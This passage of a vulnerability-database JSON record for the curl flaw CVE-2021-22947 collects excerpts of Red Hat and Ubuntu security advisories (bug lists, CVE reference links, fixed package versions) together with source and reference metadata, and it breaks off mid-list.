configured\n2056479 - ovirt-csi-driver-node pods are crashing intermittently\n2056572 - reconcilePrecaching error: cannot list resource \"clusterserviceversions\" in API group \"operators.coreos.com\" at the cluster scope\"\n2056629 - [4.10] EFS CSI driver can\u0027t unmount volumes with \"wait: no child processes\"\n2056878 - (dummy bug) ovn-kubernetes ExternalTrafficPolicy still SNATs\n2056928 - Ingresscontroller LB scope change behaviour differs for different values of aws-load-balancer-internal annotation\n2056948 - post 1.23 rebase: regression in service-load balancer reliability\n2057438 - Service Level Agreement (SLA) always show \u0027Unknown\u0027\n2057721 - Fix Proxy support in RHACM 2.4.2\n2057724 - Image creation fails when NMstateConfig CR is empty\n2058641 - [4.10] Pod density test causing problems when using kube-burner\n2059761 - 4.9.23-s390x-machine-os-content manifest invalid when mirroring content for disconnected install\n2060610 - Broken access to public images: Unable to connect to the server: no basic auth credentials\n2060956 - service domain can\u0027t be resolved when networkpolicy is used in OCP 4.10-rc\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-3577\nhttps://access.redhat.com/security/cve/CVE-2016-10228\nhttps://access.redhat.com/security/cve/CVE-2017-14502\nhttps://access.redhat.com/security/cve/CVE-2018-20843\nhttps://access.redhat.com/security/cve/CVE-2018-1000858\nhttps://access.redhat.com/security/cve/CVE-2019-8625\nhttps://access.redhat.com/security/cve/CVE-2019-8710\nhttps://access.redhat.com/security/cve/CVE-2019-8720\nhttps://access.redhat.com/security/cve/CVE-2019-8743\nhttps://access.redhat.com/security/cve/CVE-2019-8764\nhttps://access.redhat.com/security/cve/CVE-2019-8766\nhttps://access.redhat.com/security/cve/CVE-2019-8769\nhttps://access.redhat.com/security/cve/CVE-2019-8771\nhttps://access.redhat.com/security/cve/CVE-2019-8782\nhttps://access.redhat.com/security/cve/CVE-2019-8783\nhttps://access.redhat.com/security/cve/CVE-2019-8808\nhttps://access.redhat.com/security/cve/CVE-2019-8811\nhttps://access.redhat.com/security/cve/CVE-2019-8812\nhttps://access.redhat.com/security/cve/CVE-2019-8813\nhttps://access.redhat.com/security/cve/CVE-2019-8814\nhttps://access.redhat.com/security/cve/CVE-2019-8815\nhttps://access.redhat.com/security/cve/CVE-2019-8816\nhttps://access.redhat.com/security/cve/CVE-2019-8819\nhttps://access.redhat.com/security/cve/CVE-2019-8820\nhttps://access.redhat.com/security/cve/CVE-2019-8823\nhttps://access.redhat.com/security/cve/CVE-2019-8835\nhttps://access.redhat.com/security/cve/CVE-2019-8844\nhttps://access.redhat.com/security/cve/CVE-2019-8846\nhttps://access.redhat.com/security/cve/CVE-2019-9169\nhttps://access.redhat.com/security/cve/CVE-2019-13050\nhttps://access.redhat.com/security/cve/CVE-2019-13627\nhttps://access.redhat.com/security/cve/CVE-2019-14889\nhttps://access.redhat.com/security/cve/CVE-2019-15903\nhttps://access.redhat.com/security/cve/CVE-2019-19906\nhttps://access.redhat.com/security/cve/CVE-2019-20454\nhttps://access.redhat.com/security/cve/CVE-2019-20807\nhttps://access.redhat.com/security/cve/CVE-2019-25013\nhttps://access.redhat.com/security/cve/CVE-2020-1730\nhttps://access.redhat.com/security/cve/CVE-2020-3862\nhttps://access.redhat.com/security/cve/CVE-2020-3864\nhttps://access.redhat.com/security/cve/CVE-2020-3865\nhttps://access.redhat.com/security/cve/CVE-2020-3867\nhttps://access.redhat.com/security/cve/CVE-2020-3868\nhttps://access.redhat.com/security/cve/CVE-2020-3885\nhttps://access.redhat.com/security/cve/CVE-2020-3894\nhttps://access.redhat.com/security/cve/CVE-2020-3895\nhttps://access.redhat.com/security/cve/CVE-2020-3897\nhttps://access.redhat.com/security/cve/CVE-2020-3899\nhttps://access.redhat.com/security/cve/CVE-2020-3900\nhttps://access.redhat.com/security/cve/CVE-2020-3901\nhttps://access.redhat.com/security/cve/CVE-2020-3902\nhttps://access.redhat.com/security/cve/CVE-2020-8927\nhttps://access.redhat.com/security/cve/CVE-2020-9802\nhttps://access.redhat.com/security/cve/CVE-2020-9803\nhttps://access.redhat.com/security/cve/CVE-2020-9805\nhttps://access.redhat.com/security/cve/CVE-2020-9806\nhttps://access.redhat.com/security/cve/CVE-2020-9807\nhttps://access.redhat.com/security/cve/CVE-2020-9843\nhttps://access.redhat.com/security/cve/CVE-2020-9850\nhttps://access.redhat.com/security/cve/CVE-2020-9862\nhttps://access.redhat.com/security/cve/CVE-2020-9893\nhttps://access.redhat.com/security/cve/CVE-2020-9894\nhttps://access.redhat.com/security/cve/CVE-2020-9895\nhttps://access.redhat.com/security/cve/CVE-2020-9915\nhttps://access.redhat.com/security/cve/CVE-2020-9925\nhttps://access.redhat.com/security/cve/CVE-2020-9952\nhttps://access.redhat.com/security/cve/CVE-2020-10018\nhttps://access.redhat.com/security/cve/CVE-2020-11793\nhttps://access.redhat.com/security/cve/CVE-2020-13434\nhttps://access.redhat.com/security/cve/CVE-2020-14391\nhttps://access.redhat.com/security/cve/CVE-2020-15358\nhttps://access.redhat.com/security/cve/CVE-2020-15503\nhttps://access.redhat.com/security/cve/CVE-2020-25660\nhttps://access.redhat.com/security/cve/CVE-2020-25677\nhttps://access.redhat.com/security/cve/CVE-2020-27618\nhttps://access.redhat.com/security/cve/CVE-2020-27781\nhttps://access.redhat.com/security/cve/CVE-2020-29361\nhttps://access.redhat.com/security/cve/CVE-2020-29362\nhttps://access.redhat.com/security/cve/CVE-2020-29363\nhttps://access.redhat.com/security/cve/CVE-2021-3121\nhttps://access.redhat.com/security/cve/CVE-2021-3326\nhttps://access.redhat.com/security/cve/CVE-2021-3449\nhttps://access.redhat.com/security/cve/CVE-2021-3450\nhttps://access.redhat.com/security/cve/CVE-2021-3516\nhttps://access.redhat.com/security/cve/CVE-2021-3517\nhttps://access.redhat.com/security/cve/CVE-2021-3518\nhttps://access.redhat.com/security/cve/CVE-2021-3520\nhttps://access.redhat.com/security/cve/CVE-2021-3521\nhttps://access.redhat.com/security/cve/CVE-2021-3537\nhttps://access.redhat.com/security/cve/CVE-2021-3541\nhttps://access.redhat.com/security/cve/CVE-2021-3733\nhttps://access.redhat.com/security/cve/CVE-2021-3749\nhttps://access.redhat.com/security/cve/CVE-2021-20305\nhttps://access.redhat.com/security/cve/CVE-2021-21684\nhttps://access.redhat.com/security/cve/CVE-2021-22946\nhttps://access.redhat.com/security/cve/CVE-2021-22947\nhttps://access.redhat.com/security/cve/CVE-2021-25215\nhttps://access.redhat.com/security/cve/CVE-2021-27218\nhttps://access.redhat.com/security/cve/CVE-2021-30666\nhttps://access.redhat.com/security/cve/CVE-2021-30761\nhttps://access.redhat.com/security/cve/CVE-2021-30762\nhttps://access.redhat.com/security/cve/CVE-2021-33928\nhttps://access.redhat.com/security/cve/CVE-2021-33929\nhttps://access.redhat.com/security/cve/CVE-2021-33930\nhttps://access.redhat.com/security/cve/CVE-2021-33938\nhttps://access.redhat.com/security/cve/CVE-2021-36222\nhttps://access.redhat.com/security/cve/CVE-2021-37750\nhttps://access.redhat.com/security/cve/CVE-2021-39226\nhttps://access.redhat.com/security/cve/CVE-2021-41190\nhttps://access.redhat.com/security/cve/CVE-2021-43813\nhttps://access.redhat.com/security/cve/CVE-2021-44716\nhttps://access.redhat.com/security/cve/CVE-2021-44717\nhttps://access.redhat.com/security/cve/CVE-2022-0532\nhttps://access.redhat.com/security/cve/CVE-2022-21673\nhttps://access.redhat.com/security/cve/CVE-2022-24407\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYipqONzjgjWX9erEAQjQcBAAgWTjA6Q2NgqfVf63ZpJF1jPurZLPqxDL\n0in/5+/wqWaiQ6yk7wM3YBZgviyKnAMCVdrLsaR7R77BvfJcTE3W/fzogxpp6Rne\neGT1PTgQRecrSIn+WG4gGSteavTULWOIoPvUiNpiy3Y7fFgjFdah+Nyx3Xd+xehM\nCEswylOd6Hr03KZ1tS3XL3kGL2botha48Yls7FzDFbNcy6TBAuycmQZifKu8mHaF\naDAupVJinDnnVgACeS6CnZTAD+Vrx5W7NIisteXv4x5Hy+jBIUHr8Yge3oxYoFnC\nY/XmuOw2KilLZuqFe+KHig45qT+FmNU8E1egcGpNWvmS8hGZfiG1jEQAqDPbZHxp\nsQAQZLQyz3TvXa29vp4QcsUuMxndIOi+QaK75JmqE06MqMIlFDYpr6eQOIgIZvFO\nRDZU/qvBjh56ypInoqInBf8KOQMy6eO+r6nFbMGcAfucXmz0EVcSP1oFHAoA1nWN\nrs1Qz/SO4CvdPERxcr1MLuBLggZ6iqGmHKk5IN0SwcndBHaVJ3j/LBv9m7wBYVry\nbSvojBDYx5ricbTwB5sGzu7oH5yVl813FA9cjkFpEhBiMtTfI+DKC8ssoRYNHd5Z\n7gLW6KWPUIDuCIiiioPZAJMyvJ0IMrNDoQ0lhqPeV7PFdlRhT95M/DagUZOpPVuT\nb5PUYUBIZLc=\n=GUDA\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. ==========================================================================\nUbuntu Security Notice USN-5079-1\nSeptember 15, 2021\n\ncurl vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 21.04\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in curl. \n\nSoftware Description:\n- curl: HTTP, HTTPS, and FTP client and client libraries\n\nDetails:\n\nIt was discovered that curl incorrect handled memory when sending data to\nan MQTT server. A remote attacker could use this issue to cause curl to\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode. (CVE-2021-22945)\n\nPatrick Monnerat discovered that curl incorrectly handled upgrades to TLS. (CVE-2021-22946)\n\nPatrick Monnerat discovered that curl incorrectly handled responses\nreceived before STARTTLS. A remote attacker could possibly use this issue\nto inject responses and intercept communications. (CVE-2021-22947)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 21.04:\n curl 7.74.0-1ubuntu2.3\n libcurl3-gnutls 7.74.0-1ubuntu2.3\n libcurl3-nss 7.74.0-1ubuntu2.3\n libcurl4 7.74.0-1ubuntu2.3\n\nUbuntu 20.04 LTS:\n curl 7.68.0-1ubuntu2.7\n libcurl3-gnutls 7.68.0-1ubuntu2.7\n libcurl3-nss 7.68.0-1ubuntu2.7\n libcurl4 7.68.0-1ubuntu2.7\n\nUbuntu 18.04 LTS:\n curl 7.58.0-2ubuntu3.15\n libcurl3-gnutls 7.58.0-2ubuntu3.15\n libcurl3-nss 7.58.0-2ubuntu3.15\n libcurl4 7.58.0-2ubuntu3.15\n\nIn general, a standard system update will make all the necessary changes. Bugs fixed (https://bugzilla.redhat.com/):\n\n1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic\n1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet\n1997017 - unprivileged client fails to get guest agent data\n1998855 - Node drain: Sometimes source virt-launcher pod status is Failed and not Completed\n2000251 - RoleBinding and ClusterRoleBinding brought in by kubevirt does not get reconciled when kind is ServiceAccount\n2001270 - [VMIO] [Warm from Vmware] Snapshot files are not deleted after Successful Import\n2001281 - [VMIO] [Warm from VMware] Source VM should not be turned ON if vmio import is removed\n2001901 - [4.8.3] NNCP creation failures after nmstate-handler pod deletion\n2007336 - 4.8.3 containers\n2007776 - Failed to Migrate Windows VM with CDROM (readonly)\n2008511 - [CNV-4.8.3] VMI is in LiveMigrate loop when Upgrading Cluster from 2.6.7/4.7.32 to OCP 4.8.13\n2012890 - With descheduler during multiple VMIs migrations, some VMs are restarted\n2025475 - [4.8.3] Upgrade from 2.6 to 4.x versions failed due to vlan-filtering issues\n2026881 - [4.8.3] vlan-filtering is getting applied on veth ports\n\n5. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.5.2 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n2000734 - CVE-2021-3757 nodejs-immer: prototype pollution may lead to DoS or remote code execution\n2005438 - Combining Rsync and Stunnel in a single pod can degrade performance (1.5 backport)\n2006842 - MigCluster CR remains in \"unready\" state and source registry is inaccessible after temporary shutdown of source cluster\n2007429 - \"oc describe\" and \"oc log\" commands on \"Migration resources\" tree cannot be copied after failed migration\n2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)\n\n5. Description:\n\nRed Hat OpenShift Serverless release of the OpenShift Serverless Operator. \n\nSecurity Fix(es):\n\n* golang: net/http/httputil: panic due to racy read of persistConn after\nhandler panic (CVE-2021-36221)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n1995656 - CVE-2021-36221 golang: net/http/httputil: panic due to racy read of persistConn after handler panic\n2016256 - Release of OpenShift Serverless Eventing 1.19.0\n2016258 - Release of OpenShift Serverless Serving 1.19.0\n\n5",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-22947"
},
{
"db": "VULHUB",
"id": "VHN-381421"
},
{
"db": "VULMON",
"id": "CVE-2021-22947"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166714"
},
{
"db": "PACKETSTORM",
"id": "165209"
},
{
"db": "PACKETSTORM",
"id": "166279"
},
{
"db": "PACKETSTORM",
"id": "164171"
},
{
"db": "PACKETSTORM",
"id": "165135"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "165053"
}
],
"trust": 1.8
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-22947",
"trust": 2.0
},
{
"db": "SIEMENS",
"id": "SSA-389290",
"trust": 1.1
},
{
"db": "HACKERONE",
"id": "1334763",
"trust": 1.1
},
{
"db": "PACKETSTORM",
"id": "165053",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165135",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165209",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165099",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165337",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164993",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164740",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166319",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164948",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166112",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-381421",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-22947",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165631",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166714",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166279",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164171",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381421"
},
{
"db": "VULMON",
"id": "CVE-2021-22947"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166714"
},
{
"db": "PACKETSTORM",
"id": "165209"
},
{
"db": "PACKETSTORM",
"id": "166279"
},
{
"db": "PACKETSTORM",
"id": "164171"
},
{
"db": "PACKETSTORM",
"id": "165135"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "165053"
},
{
"db": "NVD",
"id": "CVE-2021-22947"
}
]
},
"id": "VAR-202109-1789",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-381421"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T21:33:54.751000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-22947 log"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-22947"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-345",
"trust": 1.1
},
{
"problemtype": "CWE-310",
"trust": 1.0
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381421"
},
{
"db": "NVD",
"id": "CVE-2021-22947"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.1,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20211029-0003/"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213183"
},
{
"trust": 1.1,
"url": "https://www.debian.org/security/2022/dsa-5197"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/mar/29"
},
{
"trust": 1.1,
"url": "https://security.gentoo.org/glsa/202212-01"
},
{
"trust": 1.1,
"url": "https://hackerone.com/reports/1334763"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2021/09/msg00022.html"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2022/08/msg00017.html"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/apoak4x73ejtaptsvt7irvdmuwvxnwgd/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/rwlec6yvem2hwubx67sdgpsy4cqb72oe/"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2021-22946"
},
{
"trust": 0.7,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2021-22947"
},
{
"trust": 0.7,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-3733"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-33938"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-33929"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-33928"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-33930"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-37750"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-22876"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3200"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-27645"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-33574"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-13435"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-5827"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-24370"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-13751"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-19603"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-35942"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17594"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12762"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-36086"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3778"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-22898"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-16135"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-36084"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3800"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-36087"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3445"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-22925"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-20232"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-20266"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-20838"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-20231"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-14155"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-36085"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-33560"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17595"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-28153"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-13750"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-18218"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3580"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3796"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14145"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3572"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-42574"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3426"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-23841"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-23840"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20266"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-20673"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-36222"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43527"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20271"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3948"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36385"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43267"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36385"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20317"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20317"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-27218"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/apoak4x73ejtaptsvt7irvdmuwvxnwgd/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/rwlec6yvem2hwubx67sdgpsy4cqb72oe/"
},
{
"trust": 0.1,
"url": "http://seclists.org/oss-sec/2021/q3/168"
},
{
"trust": 0.1,
"url": "https://security.archlinux.org/cve-2021-22947"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25013"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27823"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1870"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35524"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3575"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30758"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15389"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-5727"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-41617"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30665"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12973"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30689"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30682"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10001"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25014"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-18032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1801"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1765"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-4658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26927"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-17541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27918"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36331"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3712"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30749"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30795"
},
{
